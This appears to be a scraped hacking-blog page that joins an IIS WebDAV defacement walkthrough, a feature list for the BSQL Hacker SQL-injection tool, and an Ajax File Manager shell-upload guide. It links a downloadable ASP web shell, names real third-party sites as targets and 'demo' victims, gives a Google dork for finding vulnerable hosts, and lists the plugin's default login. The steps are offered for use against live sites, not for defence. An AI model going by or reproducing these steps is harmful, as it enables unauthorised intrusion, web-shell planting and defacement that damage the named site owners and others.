How to Hack IIS Exploit websites : The Most Easiest way of Website Hacking
Now A Folder named “Web Folders” will open.
STEP 3: Now “Right-Click” in the folder and Goto “New” and then “Web Folder“.
How to Hack IIS Exploit in Windows 7 : Detailed Tutorial with homepage hacking
IIS Exploit website Hacking in Windows Seven 7 Step By Step Explained with Images
step 1– click to see
(Go to My Computer, Do Right Cilck and Select Add a network Location)
Step 2- click to see
(click on Next)
Step 3- click to see
(click on Next)
step 4- click to see
(now enther The URL of vuln website and Click on Next, For example tka this site http://www.myxixia.com/)
Step 5- Click to see
(click on next button)
step 6- click to see
(Now click on Finish)
Step 7- Click to see
(see Network Location Option And click on website folder)
Step 8- Now Download the Shell http://www.ziddu.com/download/16498227/shell.zip.html
step 9- Click to see
(After Downloading do right click on file and click on Extract here)
Step 10- Click to see
(Now copy the Power.asp;.jpg file and open the web folder of vuln website)
Step 11- Click to see
(now paste the power.asp;.jpg file in web folder)
Step 12- Click to see
(Paste Complete)
Step 12 – Click to see
(Now open Your Browser and enter The site addres and put Power.asp;.jpg after url for example http://www.myxixia.com/power.asp;.jpg)
Step 13- Click to see
( Now click on edit file index.asp)
Step 14- click to see
(open your deface html file. do right click and select open with notepad)
Step 15- click to see
(Copy all code)
Step 16- Click to see
(paste the all code in that popup which yu got after clicking edit index.asp and click on save)
Step 17- click to see
(now you wil got a page tike this)
Step 18 You’ve done 🙂 now whne you will open that website you will got your deface page on home 🙂
BSQL Hacker : automated SQL Injection Framework Tool
BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database.
BSQL Hacker aims for experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).
Videos
New version is out, it’s mostly bug fixes :
http://labs.portcullis.co.uk/application/deep-blind-sql-injection/
Screenshot
Key Features
- Easy Mode
- SQL Injection Wizard
- Automated Attack Support (database dump)
- ORACLE
- MSSQL
- MySQL (experimental)
- General
- Fast and Multithreaded
- 4 Different SQL Injection Support
- Blind SQL Injection
- Time Based Blind SQL Injection
- Deep Blind (based on advanced time delays) SQL Injection
- Error Based SQL Injection
- Can automate most of the new SQL Injection methods those relies on Blind SQL Injection
- RegEx Signature support
- Console and GUI Support
- Load / Save Support
- Token / Nonce / ViewState etc. Support
- Session Sharing Support
- Advanced Configuration Support
- Automated Attack mode, Automatically extract all database schema and data mode
- Update / Exploit Repository Features
- Metasploit alike but exploit repository support
- Allows to save and share SQL Injection exploits
- Supports auto-update
- Custom GUI support for exploits (cookie input, URL input etc.)
- GUI Features
- Load and Save
- Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be show to the user in a GUI)
- Visually view true and false responses as well as full HTML response, including time and stats
- Connection Related
- Proxy Support (Authenticated Proxy Support)
- NTLM, Basic Auth Support, use default credentials of current user/application
- SSL (also invalid certificates) Support
- Custom Header Support
- Injection Points (only one of them or combination)
- Query String
- Post
- HTTP Headers
- Cookies
- Other
- Post Injection data can be stored in a separated file
- XML Output (not stable)
- CSRF protection support (one time session tokens or asp.net viewstate ort similar can be used for separated login sessions, bypassing proxy pages etc.)
Ajax File Manager ~ Shell and Files Upload Vulnerability
Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
For Example I got :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any site else …
Now Put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url
for example :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
Now Find Upload Upload and Upload Your shell/Deface/file
To view you File find /Uploaded/ directory in Website by using your brain 😛
example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt
Some Demo sites
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
Results :
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
if you need Login in any ajaxfilemanager
Default Password Ajax File Manager
Username:ajax
Password:123456